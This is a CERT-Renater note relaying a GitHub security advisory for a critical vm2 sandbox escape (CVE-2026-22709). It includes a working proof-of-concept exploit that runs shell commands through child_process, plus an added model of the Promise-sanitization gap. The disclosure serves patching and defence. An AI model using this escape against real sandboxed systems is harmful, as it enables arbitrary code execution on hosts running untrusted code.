
=====================================================================

                            CERT-Renater

                Information Note No. 2026/VULN083
_____________________________________________________________________

DATE                : 28/01/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running vm2 versions prior to 3.10.2.

=====================================================================
https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8
_____________________________________________________________________


Sandbox Escape
Critical
patriksimek published GHSA-99p7-6v5w-7xg8 Jan 25, 2026

Package
vm2 (npm)

Affected versions
<= 3.10.0

Patched versions
3.10.2


Description

In vm2 version 3.10.0, the callback sanitization applied to
Promise.prototype.then and Promise.prototype.catch can be bypassed.
This allows attackers to escape the sandbox and run arbitrary code.

const { VM } = require("vm2");

const code = `
const error = new Error();
error.name = Symbol();
const f = async () => error.stack;
const promise = f();
promise.catch(e => {
    const Error = e.constructor;
    const Function = Error.constructor;
    const f = new Function(
        "process.mainModule.require('child_process').execSync('echo HELLO WORLD!', { stdio: 'inherit' })"
    );
    f();
});
`;

new VM().run(code);

In lib/setup-sandbox.js, the callback function passed to
localPromise.prototype.then is sanitized, but the one passed to
globalPromise.prototype.then is not.
The return value of an async function is a globalPromise object, so
callbacks attached to it never go through the sanitized path.
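
The gap described above, reproduced as a small model (an added example, not vm2 source and not part of the original advisory). LocalPromise, sanitizedThen, guard and auditPromiseHooks are hypothetical names; the patchIntrinsic switch shows one way to close the gap in this model and is not claimed to be the 3.10.2 patch.

```javascript
const vm = require('vm');

// Simplified model of the gap. Not vm2 source: LocalPromise, sanitizedThen
// and guard are hypothetical stand-ins for the sandbox's callback hook.
const MODEL = `
(function (patchIntrinsic) {
  const GlobalPromise = Promise;               // this realm's intrinsic Promise
  const rawThen = GlobalPromise.prototype.then;

  // Stand-in sanitizer: wraps a callback so its argument could be inspected.
  const guard = (cb) =>
    typeof cb === 'function' ? function (v) { return cb.call(this, v); } : cb;

  function sanitizedThen(onFulfilled, onRejected) {
    return rawThen.call(this, guard(onFulfilled), guard(onRejected));
  }

  // The Promise class that sandboxed code reaches by name.
  class LocalPromise extends GlobalPromise {}
  LocalPromise.prototype.then = sanitizedThen;

  // Closing the gap in this model: hook the intrinsic prototype as well.
  if (patchIntrinsic) GlobalPromise.prototype.then = sanitizedThen;

  const fromLocal = LocalPromise.resolve(1);
  const fromAsync = (async () => 1)();         // always an intrinsic Promise

  return {
    asyncIsLocal: fromAsync instanceof LocalPromise,
    localHooked: fromLocal.then === sanitizedThen,
    asyncHooked: fromAsync.then === sanitizedThen,
  };
})`;

// Evaluate the model in a fresh context so the host's own Promise is untouched.
function auditPromiseHooks(patchIntrinsic) {
  return vm.runInNewContext(MODEL)(patchIntrinsic);
}

console.log('hook on LocalPromise only:', auditPromiseHooks(false));
console.log('hook on intrinsic as well:', auditPromiseHooks(true));
```

With the hook on LocalPromise only, asyncHooked is false: .then/.catch on an async function's result resolves to the unhooked intrinsic method.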


Severity            : Critical (9.8 / 10)

CVSS v3 base metrics
Attack vector       : Network
Attack complexity   : Low
Privileges required : None
User interaction    : None
Scope               : Unchanged
Confidentiality     : High
Integrity           : High
Availability        : High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID
CVE-2026-22709

Weaknesses
No CWEs


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================




